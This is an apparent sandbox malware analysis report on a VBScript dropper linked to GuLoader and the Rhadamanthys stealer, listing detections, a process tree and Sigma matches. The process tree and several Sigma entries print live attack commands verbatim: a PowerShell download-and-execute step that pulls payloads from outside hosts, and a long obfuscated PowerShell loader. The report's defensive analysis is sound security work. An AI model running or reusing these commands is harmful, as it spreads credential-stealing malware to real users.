Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YinLHGpoX4.vbs

Overview

General Information

Sample name:YinLHGpoX4.vbs
renamed because original name is a hash value
Original sample name:4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c.vbs
Analysis ID:1578231
MD5:1c13faf06926c36c9b8abc23ab38e1eb
SHA1:4085a7d8203165b83cd7283348a775d5db0ffbe1
SHA256:4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c
Tags:185-236-228-9287-120-112-91vbswww-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7544 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7820 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • WMIC.exe (PID: 7872 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RS,yl SEBeE DpTj S,4');Satsstatistikken (Kommaernes ' $ lGSiLHao GbViA Sl C: hFaU VsO E .r .ER,DDreMiSPe= n(RaT PEH SNet U-BepGaaAaTI hSp U$HoH.kVScI ,r.avKrePalUdB EGuV rGCaEPulCaSF E hRInSBe)') ;Satsstatistikken (Kommaernes 'Pi$R,gMeLAfOLgB Ba el .:SeP i ,p MI bnByGFlSAr= p$NoG olSpoEib jaReL A:DibPeAL N GD Fb FuW LF,lTvef RVinGyeNoSOv+ l+D %I $SkI oN.uuSoN c et UuW oFlUKrSBl.frC.ooCiU NStT') ;$Multilobulate=$Inunctuous[$Pipings]}$Affixal=297744;$Unattributive=29554;Satsstatistikken (Kommaernes ' E$skGSaL .oRuBH A,iL ,:s H rYStLFreunrTenHaeFlsHe Ca=C PeG eLatFa-E,CC,oP N At NeS N Jtad j,$.eHFuV ,i HR V.ee BlN B SETivP GR EL LGisJaESpR is');Satsstatistikken (Kommaernes 'U,$ Fg,nlafoAnb,oaAflsk:,aT reAbiP.nIntSl Sa=B M,[SySH yPesVet TeLomRu.HaC soSkn ,v ,e hr StIm]U :Ge:epF trFoo hmSpB .a TsFoeCo6 e4M S BtBorOriSunO,gPo(S $.iHU,y FlSteF ra nSaeNisOp)');Satsstatistikken (Kommaernes 'Lu$ igbolThOn,BNyAChlMo:GuC .UE,a TrPrtKre Tr ,OUnn . Ru=Pr .b[ GSOuyPlS TmieO M e. TCoE,eXInT U. ,e TnHac TOM d BiBonlog K]B :Pr:S a Ms crai ,i,r.TrG EEB.tG.SdutSkrMiiPan og C(Un$BuTSaEh,I.enB tAd)');Satsstatistikken (Kommaernes 'Pu$ eG MLCaoPuBiras,LRv:LiUPaNShDSaeStVZee oLreOBepLgaAaBbiLI eBa=Ok$ aCF U Na HRDoTBeENoRStOD nRe..osA uAsBL,s RtSnr iBlnNogSp( a$V AS.FHefH I.aXAeaglLBo,An$scUsoNHaaCnTHuTH REcifobT u Mt aiNaVOsENy)');Satsstatistikken $Undevelopable;" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WINWORD.EXE (PID: 7744 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\pqg5u7vt.doc" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • powershell.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Realitetsbehandler='Clairsentient';;$opdragerfunktion='Nikau';;$Amontilladoer='Brucellosis';;$Skuldret='Picker74';;$Supercanonisation=$host.Name; function Kommaernes($Outbidder){If ($Supercanonisation) {$Nedblndedes='Medbringe';$Brions=2;$Oakling=$Brions}do{$stratigrapher+=$Outbidder[$Oakling];$Oakling+=3} until(!$Outbidder[$Oakling])$stratigrapher}function Satsstatistikken($Vridning150){ .($misscribed) ($Vridning150)}$spitefullest=Kommaernes ' yn DEbyt.h. VW';$spitefullest+=Kommaernes 'abePeBU.CDiLPii eeD.n,vt';$gedeskindene=Kommaernes ',nMJ oP zU iA lCllCoa ./';$Amatren=Kommaernes ' aTTrl isIn1 C2';$Oaklingnddragelses='Sr[ FN.neChtDe. Bs DeSyR.vVArIKncUneNuP toE iBaNB.T,uMReA UnC APhgE EPrRn ]Bo:A : Hs oeFocGlUherM i Tt,yT P,krA,OSlT koo c rO FLGa= i$ Ca mGra DT MR rEM N';$gedeskindene+=Kommaernes 'A 5,e.Ov0 F(C WH,ibenOpdGlo w sS, GdNS TCh S 1Kw0py. R0Es;fu ReWByiD nFa6F,4Fl;O VaxSk6 w4Ou;Ot or ovS : .1S 3Fn1Sy.F 0gr)Pu FGBreDecP kBioly/Fa2 C0Cu1Be0Mo0Ko1Fe0Bl1 , FeF oi,er Ie afBkoA xCh/Bi1 i3Se1.a.Be0';$Enkemnds=Kommaernes ',uUStS eE ,Rac-BoaStg FE ,NTat';$Multilobulate=Kommaernes 'Knh,utCotS p CsCi: / /Glw.sw,owd .F tA,d.eeH jWab B.stcMeoAamFr/ nk ipox/ReRA eTai asEusFou,ne arPr. Gxn.s An B> ahPit BtHup sD :Mo/Ex/ w,ywT,wTa.Urf DtM sShe snSog,oi lnCeeK,e.yrM.sin.LacSko MmSk/djkFam D/TaROmeP.i sB s eu HePur O. ,xSus un';$Tunneling=Kommaernes 'Fo>';$misscribed=Kommaernes 'K,i xeGlx';$Allieres24='dalsnkning';$Medicates='\Dyrehospitalerne.Gra';Satsstatistikken (Kommaernes ' f$IsGDrl o eB uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RS,yl SEBeE DpTj S,4');Satsstatistikken (Kommaernes ' $ lGSiLHao GbViA Sl C: hFaU VsO E .r .ER,DDreMiSPe= n(RaT PEH SNet U-BepGaaAaTI hSp U$HoH.kVScI ,r.avKrePalUdB EGuV rGCaEPulCaSF E hRInSBe)') ;Satsstatistikken (Kommaernes 'Pi$R,gMeLAfOLgB Ba el .:SeP i ,p MI bnByGFlSAr= p$NoG olSpoEib jaReL A:DibPeAL N GD Fb FuW LF,lTvef RVinGyeNoSOv+ l+D %I $SkI oN.uuSoN c et UuW oFlUKrSBl.frC.ooCiU NStT') ;$Multilobulate=$Inunctuous[$Pipings]}$Affixal=297744;$Unattributive=29554;Satsstatistikken (Kommaernes ' E$skGSaL .oRuBH A,iL ,:s H rYStLFreunrTenHaeFlsHe Ca=C PeG eLatFa-E,CC,oP N At NeS N Jtad j,$.eHFuV ,i HR V.ee BlN B SETivP GR EL LGisJaESpR is');Satsstatistikken (Kommaernes 'U,$ Fg,nlafoAnb,oaAflsk:,aT reAbiP.nIntSl Sa=B M,[SySH yPesVet TeLomRu.HaC soSkn ,v ,e hr StIm]U :Ge:epF trFoo hmSpB .a TsFoeCo6 e4M S BtBorOriSunO,gPo(S $.iHU,y FlSteF ra nSaeNisOp)');Satsstatistikken (Kommaernes 'Lu$ igbolThOn,BNyAChlMo:GuC .UE,a TrPrtKre Tr ,OUnn . Ru=Pr .b[ GSOuyPlS TmieO M e. TCoE,eXInT U. ,e TnHac TOM d BiBonlog K]B :Pr:S a Ms crai ,i,r.TrG EEB.tG.SdutSkrMiiPan og C(Un$BuTSaEh,I.enB tAd)');Satsstatistikken (Kommaernes 'Pu$ eG MLCaoPuBiras,LRv:LiUPaNShDSaeStVZee oLreOBepLgaAaBbiLI eBa=Ok$ aCF U Na HRDoTBeENoRStOD nRe..osA uAsBL,s RtSnr iBlnNogSp( a$V AS.FHefH I.aXAeaglLBo,An$scUsoNHaaCnTHuTH REcifobT u Mt aiNaVOsENy)');Satsstatistikken $Undevelopable;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7256 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 8040 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • svchost.exe (PID: 7940 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
      0000000B.00000002.2214210925.0000000008970000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000014.00000003.2336659742.0000000004D20000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000013.00000003.2325408969.0000000022DE0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            20.3.svchost.exe.4b00000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              20.3.svchost.exe.4d20000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                19.3.msiexec.exe.23000000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  19.3.msiexec.exe.22de0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    20.3.svchost.exe.4d20000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 1 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_7968.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_5568.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xa12a:$b2: ::FromBase64String(
                        • 0x91c8:$s1: -join
                        • 0x2974:$s4: +=
                        • 0x2a36:$s4: +=
                        • 0x6c5d:$s4: +=
                        • 0x8d7a:$s4: +=
                        • 0x9064:$s4: +=
                        • 0x91aa:$s4: +=
                        • 0x12e9d:$s4: +=
                        • 0x12f1d:$s4: +=
                        • 0x12fe3:$s4: +=
                        • 0x13063:$s4: +=
                        • 0x13239:$s4: +=
                        • 0x132bd:$s4: +=
                        • 0x99d0:$e4: Get-WmiObject
                        • 0x9bbf:$e4: Get-Process
                        • 0x9c17:$e4: Start-Process
                        • 0x13b28:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Potentially Suspicious PowerShell Child Processes
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , ProcessId: 7820, ProcessName: wscript.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\k9o5xs1hnem9ja8a.vbs" , ProcessId: 7820, ProcessName: wscript.exe
                        Sigma detected: Suspicious Invoke-WebRequest Execution
                        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', ProcessId: 7592, ProcessName: powershell.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ProcessId: 7544, ProcessName: wscript.exe
                        Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7592, TargetFilename: C:\Users\Public\k9o5xs1hnem9ja8a.vbs
                        Sigma detected: Msiexec Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49754
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7592, TargetFilename: C:\Users\Public\k9o5xs1hnem9ja8a.vbs
                        Sigma detected: PowerShell Web Download
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/lm/lm.vbs' -destination 'C:\Users\Public\k9o5xs1hnem9ja8a.vbs';DownloadAndRun -url 'https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc' -destination 'C:\Users\Public\pqg5u7vt.doc', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\YinLHGpoX4.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7544, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 